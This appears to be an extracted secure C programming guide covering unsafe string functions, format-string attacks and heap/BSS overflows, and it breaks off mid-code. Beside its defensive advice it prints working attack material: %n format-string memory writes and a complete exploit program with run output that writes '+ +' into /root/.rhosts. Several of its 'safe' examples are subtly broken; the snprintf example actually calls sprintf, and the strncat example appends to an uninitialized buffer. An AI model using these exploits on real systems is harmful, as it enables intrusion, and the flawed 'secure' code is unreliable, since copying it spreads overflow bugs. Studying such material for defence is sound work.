You are on page 1of 62

Secure C Programming Guidelines

Buffer Overflows
By far one of the most common security vulnerabilities, buffer overflows run rampant in
many of today’s applications. Surprisingly enough, this problem is not new, and in many
cases has existed in the same operating systems and applications for decades (such as
some UNIX variants). The frequency with which this type of problem is being discovered
and exploited in mission critical software has grown significantly within the past decade.
This isn’t because the problems didn’t exist, but because this type of attack required a
higher level of sophistication than the average attacker possessed – and most creators and
users of the technology were previously not interested in exploiting it to begin with.
Today, with cookie-cutter instructions on how to take advantage of these problems, and
the shear increase in the number of miscreants, minimal expertise is required.
A buffer overflow occurs when a piece of data is copied into a location in memory, which
is not large enough to hold the piece of data. The copying succeeds, however, memory
outside of the boundary of the target memory is also written over. Variables in a program
are either allocated on the programs stack, or the programs heap. Therefore it is common
to hear the terms stack overflow and heap overflow. While both types of overflows are
possible to exploit, the stack overflow is in many cases much easier.

2
strcpy – copies strings
char * strcpy(char *dst, const char *src)
The strcpy() and strncpy() functions copy the string src to dst (including the terminating
‘\0’ character).
/*
Example code and discussion of the insecure use of strcpy
From [1] Smashing The Stack For Fun And Profit
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void func(char *str)


{
char buffer[16];
strcpy(buffer,str);
return;
}

int main()
{
char large_string[256];
int i;

for( i = 0; i < 255; i++)


large_string[i] = ‘A’;
func(large_string);
exit(0);
}

Running this program results in the following:


bash-2.04$ ./strcpy-example
Segmentation fault (core dumped)

Why do we get a segmentation violation? strcpy() is coping the contents of *str


(large_string[]) into buffer[]until a null character is found on the string. As we can see
buffer[] is much smaller than *str. buffer[] is 16 bytes long, and we are trying to stuff it
with 256 bytes. This means that all 250 bytes after buffer in the stack are being
overwritten. This includes the SFP, RET, and even *str! We had filled large_string with
the character ‘A’. It’s hex character value is 0x41. That means that the return address is
now 0x41414141. This is outside of the process address space. That is why when the

3
function returns and tries to read the next instruction from that address you get a
segmentation violation.
So a buffer overflow allows us to change the return address of a function. In this way we
can change the flow of execution of the program.
Examining the stack with [2]GDB (The GNU Debugger):
bash-2.04$ gdb
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type “show copying” to see the conditions.
There is absolutely no warranty for GDB. Type “show warranty” for details.
This GDB was configured as “i386-unknown-freebsd”.
(gdb) core strcpy-example.core
Core was generated by ‘strcpy-example’.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info all-registers
eax 0xbfbffa70 -1077937552
ecx 0xbfbffb78 -1077937288
edx 0xbfbffbb8 -1077937224
ebx 0x1 1
esp 0xbfbffa88 0xbfbffa88
ebp 0x41414141 0x41414141
esi 0xbfbffc04 -1077937148
edi 0xbfbffc0c -1077937140
eip 0x41414141 0x41414141
eflags 0x10282 66178
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb)

4
strncpy
char * strncpy(char *dst, const char *src, size_t len)
The strncpy() copies not more than len characters into dst, appending ‘\0’ characters if src
is less than len characters long, and not terminating dst if src is more than len characters
long.
/* Example program showing secure alternative to strcpy */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void function(char *str)


{
char buffer[256];
strncpy(buffer, str, sizeof(buffer) -1);
buffer[sizeof(buffer) - 1] = 0;

return;
}
int main()
{
char large_string[256];
int i;

for( i = 0; i < 255; i++)


large_string[i] = ‘A’;
function(large_string);
exit(0);
}

5
strcat – concatenates strings
char * strcat(char *s, const char *append)
The strcat() and strncat() functions append a copy of the null-terminated string append to
the end of the null-terminated string s, then add a terminating ‘\0’. The strcat() function,
much like strcpy(), does not perform any length checking on the string which it will
append to. Use strncat() to restrict the length of data copied.

#include<stdlib.h>
#include <stdio.h>
#include <string.h>

void function(char *str)


{
char buffer[256];
strcat(buffer, str);
return;
}
int main()
{
char large_string[256];
int i;
for( i = 0; i < 255; i++)
large_string[i] = ‘A’;
function(large_string);
exit(0);
}

6
strncat
char * strncat(char *s, const char *append, size_t count)
The strncat() function appends not more than count characters from append, and then
adds a terminating ‘\0’.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void function(char *str)
{
char buffer[256];
strncat(buffer, str, sizeof(buffer) - 1);
return;
}
int main()
{
char large_string[256];
int i;
for( i = 0; i < 255; i++)
large_string[i] = ‘A’;
function(large_string);
exit(0);
}

7
sprintf –writes char *format to the character string str
int sprintf(char *str, const char *format, ...)
sprintf() and vsprintf() effectively assume an infinite size.
/*
Example program showing insecure use of sprintf function
Based on code snippet from: [3] Secure Programming v1.00
Changes: The code snippet has been transformed into a complete program and the buffer
length has been modified to overwrite eip
*/
#include <stdlib.h>
#include <stdio.h>
void function(char *str)
{
char buffer[250];
sprintf(buffer, “%s”, str);
return;
}

int main()
{
char large_string[256];
int i;
for( i = 0; i < 275; i++)
large_string[i] = ‘A’;
function(large_string);
exit(0);
}

8
snprintf
int snprintf(char *str, size_t size, const char *format, ...)
snprintf() and vsnprintf() will write at most size-1 of the characters printed into the output
string (the size’th character then obtains the terminating ‘\0’); if the return value is greater
than or equal to the size argument, the string was too short and some of the printed
characters were discarded.
#include <stdlib.h>
#include <stdio.h>
void function(char *str)
{
char buffer[250];

sprintf(buffer, "%s", str);

return;
}
int main()
{
char large_string[276];
int i;

for( i = 0; i < 275; i++)


large_string[i] = 'A';

function(large_string);
exit(0);
}

9
gets - get a line from a stream
char * gets(char *str)
The gets() function is equivalent to fgets() with an infinite size and a stream of stdin,
except that the newline character (if any) is not stored in the string. It is the caller’s
responsibility to ensure that the input line, if any, is sufficiently short to fit in the string.
The gets() function is inherently flawed and should never be used. gets() has no provision
for specifying a length, and always lead to an overflow.
#include <stdlib.h>

int main()
{
char buffer[5];
printf("Input a line of data (buffer is 5 bytes)\n");
gets(buffer);
printf("You typed: %s \n",buffer);
exit(0);
}
When compiled on FreeBSD 4.3-BETA gcc will even warn you of the dangers of gets()
as shown:
bash-2.04$ gcc -o gets-example gets-example.c
/tmp/ccIaqkz3.o: In function `main':
/tmp/ccIaqkz3.o(.text+0x1e): warning: this program uses gets(), which is unsafe.
bash-2.04$

10
fgets
char * fgets(char *str, int size, FILE *stream)
The fgets() function reads at most one less than the number of characters specified by
size from the given stream and stores them in the string str. Reading stops when a
newline character is found, at end-of-file or error. The newline, if any, is retained. If any
characters are read and there is no error, a ‘\0’ character is appended to end the string.
#include <stdlib.h>

int main()
{
char buffer[256];
printf("Input a line of data (buffer is 256 bytes)\n");
fgets(buffer, sizeof(buffer) - 1, stdin);
printf("You typed: %s\n",buffer);
exit(0);
}

fscanf, scanf, sscanf


The scanf() family of functions scans input according to a format.
int fscanf(FILE *stream, const char *format, ...)

#include <stdio.h>
int main()
{
char buffer[256];
int num;
num = fscanf(stdin, “%s”, buffer);
exit(0);
}

11
In this example, only a maximum of 255 characters can be read into the specified buffer.

#include <stdlib.h>
#include <stdio.h>

int main()
{
char buffer[256];
int num;
num = fscanf(stdin, “%255s”, buffer);
exit(0);
}
memcpy - copy byte string void * memcpy(void *dst, const void *src, size_t len)
There have been a few instances where overflows have occurred due to unsafe usage of
the memcpy() function. This may occur when the length specified to the memcpy()
function can be manipulated by an outside source. It is important to ensure that the
length is not larger than the memory structure being copied into. A good example of how
an overflow like this can occur is illustrated as follows:
unsigned long copyaddress(struct hosten *hp) {
unsigned long address;

memcpy(&address, hp->h_addr_list[0], hp->h_length);


}

The above example is taken from an actual vulnerability that was present in the BIND
(Berkeley Internet Name Daemon) distribution, and resulted in a number of
vulnerabilities in various programs. It has been simplified for the purpose of this
example. The above function copies hp->h_length number of bytes into the ‘address’
variable (which is 4 bytes). Under normal circumstances, hp->h_length will always be 4,
since that is the size of an internet address. If, however, an attacker can manipulate the
h_length variable, which he can, if he can spoof a fake DNS reply, he can make the
length larger, and pass in more data via the hp->h_addr_list variable. This will cause
more than 4 bytes to be copied into the ‘address’ variable, overflowing the variable and
copying data into the stack.

12
Always ensure that you check the length before performing such an action. For example:

unsigned long copyaddress(struct hosten *hp) {


unsigned long address;

if (hp->h_length > sizeof(address))


return 0;
memcpy(&address, hp->h_addr_list[0], hp->h_length);

return address;
}

Format Strings
What is a Format String Attack?
Format string bugs come from the same dark corner as many other security
holes: The laziness of programmers. Somewhere out there right now, as this
document is being read, there is a programmer writing code. His task: to
print out a string or copy it to some buffer. What he means to write is
something like:
printf(“%s”, str);
but instead he decides that he can save time, effort and 6 bytes of source code by typing:
printf(str);
Why not? Why bother with the extra printf argument and the time it takes to parse
through that silly format? The first argument to printf is a string to be printed anyway!
Because the programmer has just unknowingly opened a security hole that allows an
attacker to control the execution of the program, that’s why!
What did the programmer do that was so wrong? He passed in a string that he wanted
printed verbatim. Instead, the string is interpreted by the printf function as a format
string. It is scanned for special format characters such as “%d”. As formats are
encountered, a variable number of argument values are retrieved from the stack. At the
least, it should be obvious that an attacker can peek into the memory of the program by
printing out these values stored on the stack. What may not be as obvious is that this
simple mistake gives away enough control to allow an arbitrary value to be written into
the memory of the running program.

13
Printf – What they forgot to tell you in school
Before getting into the details of how to abuse printf for our own
purposes, we should have a firm grasp of the features printf provides. It
is assumed that the reader has used printf functions before and knows
about its normal formatting features, such as how to print integers and
strings, and how to specify minimum and maximum string widths. In addition
to these more mundane features, there are a few esoteric and little-known
features. Of these features, the following are of particular relevance to
us:
It is possible to get a count of the number of characters output at any point in the format
string. When the “%n” format is encountered in the format string, the number of
characters output before the %n field was encountered is stored at the address passed in
the next argument. As an example, to receive the offset to the space between two
formatted numbers:

int pos, x = 235, y = 93;


printf(“%d %n%d\n”, x, &pos, y);
printf(“The offset was %d\n”, pos);

The “%n” format returns the number of characters that should have been output, not the
actual count of characters that were output. When formatting a string into a fixed-size
buffer, the output string may be truncated. Despite this truncation, the offset returned by
the “%n” format will reflect what the offset would have been if the string was not
truncated. To illustrate this point, the following code will output the value “100” and not
“20”:

char buf[20];
int pos, x = 0;

snprintf(buf, sizeof buf, “%.100d%n”, x, &pos);


printf(“position: %d\n”, pos);

14
A Simple Example:
Rather than talking in vagaries and abstractions, we will use a concrete
example to illustrate the principles as they are discussed. The following
simple program will suffice for this purpose:
/*
fmtme.c
Format a value into a fixed-size buffer
*/

#include <stdio.h>

int main(int argc, char **argv)


{
char buf[100];
int x;
if(argc != 2)
exit(1);
x = 1;
snprintf(buf, sizeof buf, argv[1]);
buf[sizeof buf - 1] = 0;
printf(“buffer (%d): %s\n”, strlen(buf), buf);
printf(“x is %d/%#x (@ %p)\n”, x, x, &x);
return 0;
}

A few notes about this program are in order. First, the general purpose
is quite simple: A value passed on the command line is formatted into a
fixed-length buffer. Care is taken to make sure the buffer limits are not
exceeded. After the buffer is formatted, it is output. In addition to
formatting the argument, a second integer value is set and later output.
This variable will be used as the target of attacks later. For now, it
should be noted that its value should always be one.
All examples in this document were actually performed on an x86 BSD/OS 4.1 box. If
you have been on a mission to Mozambique for the last 20 years and are unfamiliar with
the x86, it is a little-endian machine. This will be reflected in the examples when multi-
precision numbers are expressed as a series of byte values. The actual numbers used here
will vary from system to system with differences in architecture, operating system,
environment and even command line length. The examples should be easily adjusted to
work on other x86 machines. With some effort and thought, they may be made to work
on other architectures as well.

15
Format Me!
It is now time to put on our black hats and start thinking like attackers.
We have in our hands a test program. We know that it has a vulnerability
and we know where the programmer made his mistake. We are also armed with
a thorough knowledge of the printf function and what it can do for us. Let’s
get to work by tinkering with our program.
Starting off simple, we invoke the program with normal arguments. Let’s begin with this:
% ./fmtme “hello world”
buffer (11): hello world
x is 1/0x1 (@ 0x804745c)

There’s nothing special going on here. The program formatted our string
into the buffer and then printed its length and the value out. It also told
us that the variable x has the value one (shown in decimal and hex) and that
it was stored at the address 0x804745c.
Next lets try providing some format directives. In this example we’ll print out the
integers on the stack above the format string:
% ./fmtme “%x %x %x %x”
buffer (15): 1 f31 1031 3133
x is 1/0x1 (@ 0x804745c)

A quick analysis of the program will reveal that the stack layout of the
program when the snprintf function is called is:
Address Contents Description
fp+8 Buffer pointer 4-byte address
fp+12 Buffer length 4-byte integer
fp+16 Format string 4-byte address
fp+20 Variable x 4-byte integer
fp+24 Variable buf 100 characters

The four values output in the previous test were the next four arguments on
the stack after the format string: the variable x, then three 4-byte
integers
taken from the uninitialized buf variable.
Now it is time for an epiphany. As an attacker, we control the values stored in the buffer.
These values are also used as arguments to the snprintf call!
Let’s verify this with a quick test:
% ./fmtme “aaaa %x %x”
buffer (15): aaaa 1 61616161
x is 1/0x1 (@ 0x804745c)

Yup! The four ‘a’ characters we provided were copied to the start of the
buffer and then interpreted by snprintf as an integer argument with the

16
value 0x61616161 (‘a’ is 0x61 in ASCII).
X MARKS THE SPOT
All the pieces are falling into place! It is time to step up our attack
from passive probes to actively altering the state of the program.
Remember that variable “x”? Let’s try to change its value. To do this, we
will have to enter its address into one of snprintf’s arguments. We will
then have to skip over the first argument to snprintf, which is the
variable x, and finally, use a “%n” format to write to the address we
specified. This sounds more complicated than it actually is. An example
should clarify things. [Note: We’re using PERL here to execute the program
which allows us to easily place arbitrary characters in the command line
arguments]:
% perl -e ‘system “./fmtme”, “\x58\x74\x04\x08%d%n”’
buffer (5): X1
x is 5/x05 (@ 0x8047458)

The value of x changed, but exactly what is going on here? The arguments
to snprintf look something like this:
snprintf(buf, sizeof buf, “\x58\x74\x04\x08%d%n”, x, 4 bytes from buf)
At first snprintf copies the first four bytes into buf. Next it scans the “%d” format and
prints out the value of x. Finally it reaches the “%n” directive. This pulls the next value
off the stack, which comes from the first four bytes of buf. These four bytes have just
been filled with “\x58\x74\x04\x08”, or, interpreted as an integer, 0x08047458. Snprintf
then writes the amount of bytes output so far, five, into this address. As it turns out, that
address is the address of the variable x. This is no coincidence. We carefully chose the
value 0x08047458 by previous examination of the program. In this case, the program was
helpful in printing out the address we were interested in. More typically, this value would
have to be discovered with the aid of a debugger.
Well, great! We can pick an arbitrary address (well, almost arbitrary; as long as the
address contains no NUL characters) and write a value into it. But can we write a useful
value into it? Snprintf will only write out the number of characters output so far. If we
want to write out a small value greater than four then the solution is quite simple: Pad out
the format string until we get the right value. But what about larger values? Here is where
we take advantage of the fact that “%n” will count the number of characters that should
have been output if there was no truncation:
% perl -e ‘system “./fmtme”, “\x54\x74\x04\x08%.500d%n”
buffer (99): %0000000 ... 0000
x is 504/x1f8 (@ 0x8047454)

The value that “%n” wrote to x was 504, much larger than the 99 characters
actually emitted to buf. We can provide arbitrarily large values by just
specifying a large field width [1]. And what about small values? We can
construct arbitrary values (even the value zero), by piecing together
several writes. If we write out four numbers at one-byte offsets, we can

17
construct an arbitrary integer out of the four least-significant bytes. To
illustrate this, consider the following four writes:
Address A A+1 A+2 A+3 A+4 A+5 A+6
Write to A: 0x11 0x11 0x11 0x11
Write to A+1: 0x22 0x22 0x22 0x22
Write to A+2: 0x33 0x33 0x33 0x33
Write to A+3: 0x44 0x44 0x44 0x44
Memory: 0x11 0x22 0x33 0x44 0x44 0x44 0x44

After the four writes are completed, the integer value 0x44332211 is left
in memory at address A, composed of the least-significant byte of the four
writes. This technique gives us flexibility in choosing values to write, but
it does have some drawbacks: It takes four times as many writes to set the
value. It overwrites three bytes neighboring the target address. It also
performs three unaligned write operations. Since some architectures do not
support unaligned writes, this technique is not universally applicable.
SO WHAT?
So what? So what!? SO WHAT!#@?? So you can write arbitrary values to (almost
any) arbitrary addresses in memory!!! Surely you can think of a good use
for this. Let’s see:
Overwrite a stored UID for a program that drops and elevates privileges.
Overwrite an executed command.
Overwrite a return address to point to some buffer with shell code in it.

18
Heap Overflows
Prelude:
Heap/BSS-based overflows are fairly common in applications today; yet,
they are rarely reported. Therefore, we felt it was appropriate to
present a "heap overflow" tutorial. The biggest critics of this article
will probably be those who argue heap overflows have been around for a
while. Of course they have, but that doesn't negate the need for such
material.

In this article, we will refer to "overflows involving the stack" as


"stack-based overflows" ("stack overflow" is misleading) and "overflows
involving the heap" as "heap-based overflows".

This article should provide the following: a better understanding


of heap-based overflows along with several methods of exploitation,
demonstrations, and some possible solutions/fixes. Prerequisites to
this article: a general understanding of computer architecture,
assembly, C, and stack overflows.

This is a collection of the insights we have gained through our research


with heap-based overflows and the like. We have written all the
examples and exploits included in this article; therefore, the copyright
applies to them as well.

Why Heap/BSS Overflows are Significant


As more system vendors add non-executable stack patches, or individuals
apply their own patches (e.g., Solar Designer's non-executable stack
patch), a different method of penetration is needed by security
consultants (or else, we won't have jobs!). Let me give you a few
examples:

1. Searching for the word "heap" on BugTraq (for the archive, see
www.geek-girl.com/bugtraq), yields only 40+ matches, whereas
"stack" yields 2300+ matches (though several are irrelevant). Also,
"stack overflow" gives twice as many matches as "heap" does.

2. Solaris (an OS developed by Sun Microsystems), as of Solaris


2.6, sparc Solaris includes a "protect_stack" option, but not an
equivalent "protect_heap" option. Fortunately, the bss is not
executable (and need not be).

3. There is a "StackGuard" (developed by Crispin Cowan et. al.), but


no equivalent "HeapGuard".

4. Using a heap/bss-based overflow was one of the "potential" methods

19
of getting around StackGuard. The following was posted to BugTraq
by Tim Newsham several months ago:

> Finally the precomputed canary values may be a target


> themselves. If there is an overflow in the data or bss segments
> preceding the precomputed canary vector, an attacker can simply
> overwrite all the canary values with a single value of his
> choosing, effectively turning off stack protection.

5. Some people have actually suggested making a "local" buffer a


"static" buffer, as a fix! This not very wise; yet, it is a fairly
common misconception of how the heap or bss work.

Although heap-based overflows are not new, they don't seem to be well
understood.

Note:
One argument is that the presentation of a "heap-based overflow" is
equivalent to a "stack-based overflow" presentation. However, only a
small proportion of this article has the same presentation (if you
will) that is equivalent to that of a "stack-based overflow".

People go out of their way to prevent stack-based overflows, but leave


their heaps/bss' completely open! On most systems, both heap and bss are
both executable and writeable (an excellent combination). This makes
heap/bss overflows very possible. But, I don't see any reason for the
bss to be executable! What is going to be executed in zero-filled
memory?!

For the security consultant (the ones doing the penetration assessment),
most heap-based overflows are system and architecture independent,
including those with non-executable heaps. This will all be demonstrated
in the "Exploiting Heap/BSS Overflows" section.

Terminology

An executable file, such as ELF (Executable and Linking Format)


executable, has several "sections" in the executable file, such as: the
PLT (Procedure Linking Table), GOT (Global Offset Table), init
(instructions executed on initialization), fini (instructions to be
executed upon termination), and ctors and dtors (contains global
constructors/destructors).

"Memory that is dynamically allocated by the application is known as the


heap." The words "by the application" are important here, as on good

20
systems most areas are in fact dynamically allocated at the kernel level,
while for the heap, the allocation is requested by the application.

Heap and Data/BSS Sections


The heap is an area in memory that is dynamically allocated by the
application. The data section initialized at compile-time.

The bss section contains uninitialized data, and is allocated at


run-time. Until it is written to, it remains zeroed (or at least from
the application's point-of-view).

Note:
When we refer to a "heap-based overflow" in the sections below, we are
most likely referring to buffer overflows of both the heap and data/bss
sections.

On most systems, the heap grows up (towards higher addresses). Hence,


when we say "X is below Y," it means X is lower in memory than Y.

Exploiting Heap/BSS Overflows

In this section, we'll cover several different methods to put heap/bss


overflows to use. Most of examples for Unix-dervied x86 systems, will
also work in DOS and Windows (with a few changes). We've also included
a few DOS/Windows specific exploitation methods. An advanced warning:
this will be the longest section, and should be studied the most.

Note:
In this article, I use the "exact offset" approach. The offset
must be closely approximated to its actual value. The alternative is
"stack-based overflow approach" (if you will), where one repeats the
addresses to increase the likelihood of a successful exploit.

21
While this example may seem unnecessary, we're including it for those who
are unfamiliar with heap-based overflows. Therefore, we'll include this
quick demonstration:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 16
#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

int main()
{
u_long diff;
char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char
*)malloc(BUFSIZE);

diff = (u_long)buf2 - (u_long)buf1;


printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2,
diff);

memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';

printf("before overflow: buf2 = %s\n", buf2);


memset(buf1, 'B', (u_int)(diff + OVERSIZE));
printf("after overflow: buf2 = %s\n", buf2);

return 0;
}

If we run this, we'll get the following:

[root /w00w00/heap/examples/basic]# ./heap1 8


buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA

This works because buf1 overruns its boundaries into buf2's heap space.
But, because buf2's heap space is still valid (heap) memory, the program
doesn't crash.

Note:
A possible fix for a heap-based overflow, which will be mentioned
later, is to put "canary" values between all variables on the heap
space (like that of StackGuard mentioned later) that mustn't be changed
throughout execution.

You can get the complete source to all examples used in this article,
from the file attachment, heaptut.tgz. You can also download this from

22
our article archive at http://www.w00w00.org/articles.html.

Note:
To demonstrate a bss-based overflow, change line:
from: 'char *buf = malloc(BUFSIZE)', to: 'static char buf[BUFSIZE]'

Yes, that was a very basic example, but we wanted to demonstrate a heap
overflow at its most primitive level. This is the basis of almost
all heap-based overflows. We can use it to overwrite a filename, a
password, a saved uid, etc. Here is a (still primitive) example of
manipulating pointers:
/* demonstrates static pointer overflow in bss (uninitialized data)
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define BUFSIZE 16
#define ADDRLEN 4 /* # of bytes in an address */

int main()
{
u_long diff;
static char buf[BUFSIZE], *bufptr;

bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;

printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",


&bufptr, bufptr, buf, diff, diff);

memset(buf, 'A', (u_int)(diff + ADDRLEN));

printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",


&bufptr, bufptr, buf, diff, diff);

return 0;
}

The results:

[root /w00w00/heap/examples/basic]# ./heap3


bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16)
bytes
bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16)
bytes

When run, one clearly sees that the pointer now points to a different
address. Uses of this? One example is that we could overwrite a

23
temporary filename pointer to point to a separate string (such as
argv[1], which we could supply ourselves), which could contain
"/root/.rhosts". Hopefully, you are starting to see some potential uses.

To demonstrate this, we will use a temporary file to momentarily save


some input from the user. This is our finished "vulnerable program":
/*
* This is a typical vulnerable program. It will store user input
in a
* temporary file.
*
* Compile as: gcc -o vulprog1 vulprog1.c
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16

/*
* Run this vulprog as root or change the "vulfile" to something
else.
* Otherwise, even if the exploit works, it won't have permission to
* overwrite /root/.rhosts (the default "example").
*/

int main(int argc, char **argv)


{
FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;

if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}
tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul
*/
printf("before: tmpfile = %s\n", tmpfile);
printf("Enter one line of data to put in %s: ", tmpfile);
gets(buf);
printf("\nafter: tmpfile = %s\n", tmpfile);
tmpfd = fopen(tmpfile, "w");
if (tmpfd == NULL)
{
fprintf(stderr, "error opening %s: %s\n", tmpfile,
strerror(errno));

exit(ERROR);
}

24
fputs(buf, tmpfd);
fclose(tmpfd);
}

The aim of this "example" program is to demonstrate that something of


this nature can easily occur in programs (although hopefully not
setuid
or root-owned daemon servers).

And here is our exploit for the vulnerable program:

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The
vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we
can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string
(what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256

#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */

#define VULPROG "./vulprog1"


#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in
*/

/* get value of sp off the stack (used to calculate argv[1] address)


*/
u_long getesp()
{
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv)

25
{
u_long addr;

register int i;
int mainbufsize;

char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";

/* ------------------------------------------------------ */
if (argc <= 1)
{
fprintf(stderr, "Usage: %s [try 310-330]\n", argv[0]);
exit(ERROR);
}
/* ------------------------------------------------------ */

memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# ");

memset(buf + strlen(buf), 'A', DIFF);


addr = getesp() + atoi(argv[1]);

/* reverse byte order (on a little endian system) */


for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);

mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) +


13;

mainbuf = (char *)malloc(mainbufsize);


memset(mainbuf, 0, sizeof(mainbufsize));

snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",


buf, VULPROG, VULFILE);

printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",


addr, VULFILE);

system(mainbuf);
return 0;
}

Here's what happens when we run it:


[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320
Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts
after.

before: tmpfile = /tmp/vulprog.tmp


Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /vulprog1

Well, we can see that's part of argv[0] ("./vulprog1"), so we know we


are
close:
[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330
Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts
after.

26
before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /root/.rhosts
[root /tmp/heap/examples/advanced/vul-pkg1]#

Got it! The exploit overwrites the buffer that the vulnerable program
uses for gets() input. At the end of its buffer, it places the
address
of where we assume argv[1] of the vulnerable program is. That is, we
overwrite everything between the overflowed buffer and the tmpfile
pointer. We ascertained the tmpfile pointer's location in memory by
sending arbitrary lengths of "A"'s until we discovered how many "A"'s
it
took to reach the start of tmpfile's address. Also, if you have
source to the vulnerable program, you can also add a "printf()" to
print
out the addresses/offsets between the overflowed data and the target
data
(i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').

(Un)fortunately, the offsets usually change at compile-time (as far as


I know), but we can easily recalculate, guess, or "brute force" the
offsets.

Note:
Now that we need a valid address (argv[1]'s address), we must
reverse
the byte order for little endian systems. Little endian systems use
the least significant byte first (x86 is little endian) so that
0x12345678 is 0x78563412 in memory. If we were doing this on a big
endian system (such as a sparc) we could drop out the code to
reverse
the byte order. On a big endian system (like sparc), we could leave
the addresses alone.

Further note:
So far none of these examples required an executable heap! As I
briefly mentioned in the "Why Heap/BSS Overflows are Significant"
section, these (with the exception of the address byte order)
previous
examples were all system/architecture independent. This is useful in
exploiting heap-based overflows.

With knowledge of how to overwrite pointers, we're going to show how


to
modify function pointers. The downside to exploiting function
pointers
(and the others to follow) is that they require an executable heap.

A function pointer (i.e., "int (*funcptr)(char *str)") allows a


programmer to dynamically modify a function to be called. We can
overwrite a function pointer by overwriting its address, so that when
it's executed, it calls the function we point it to instead. This is
good news because there are several options we have. First, we
can include our own shellcode. We can do one of the following with
shellcode:

27
1. argv[] method: store the shellcode in an argument to the program
(requiring an executable stack)

2. heap offset method: offset from the top of the heap to the
estimated address of the target/overflow buffer (requiring an
executable heap)

Note: There is a greater probability of the heap being executable than


the stack on any given system. Therefore, the heap method will
probably
work more often.

A second method is to simply guess (though it's inefficient) the


address
of a function, using an estimated offset of that in the vulnerable
program. Also, if we know the address of system() in our program, it
will be at a very close offset, assuming both vulprog/exploit were
compiled the same way. The advantage is that no executable is
required.

Note:
Another method is to use the PLT (Procedure Linking Table) which
shares
the address of a function in the PLT. I first learned the PLT
method
from str (stranJer) in a non-executable stack exploit for sparc.

The reason the second method is the preferred method, is simplicity.


We can guess the offset of system() in the vulprog from the address of
system() in our exploit fairly quickly. This is synonymous on remote
systems (assuming similar versions, operating systems, and
architectures). With the stack method, the advantage is that we can
do
whatever we want, and we don't require compatible function pointers
(i.e., char (*funcptr)(int a) and void (*funcptr)() would work the
same).
The disadvantage (as mentioned earlier) is that it requires an
executable stack.

Here is our vulnerable program for the following 2 exploits:


----------------------------------------------------------------------
-------
/*
* Just the vulnerable program we will exploit.
* Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
*/

#include
#include
#include
#include

#define ERROR -1
#define BUFSIZE 64

int goodfunc(const char *str); /* funcptr starts out as this */

28
int main(int argc, char **argv)
{
static char buf[BUFSIZE];
static int (*funcptr)(const char *str);

if (argc <= 2)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}

printf("(for 1st exploit) system() = %p\n", system);


printf("(for 2nd exploit, stack method) argv[2] = %p\n",
argv[2]);
printf("(for 2nd exploit, heap offset method) buf = %p\n\n",
buf);

funcptr = (int (*)(const char *str))goodfunc;


printf("before overflow: funcptr points to %p\n", funcptr);

memset(buf, 0, sizeof(buf));
strncpy(buf, argv[1], strlen(argv[1]));
printf("after overflow: funcptr points to %p\n", funcptr);

(void)(*funcptr)(argv[2]);
return 0;
}

/* ---------------------------------------------- */

/* This is what funcptr would point to if we didn't overflow it */


int goodfunc(const char *str)
{
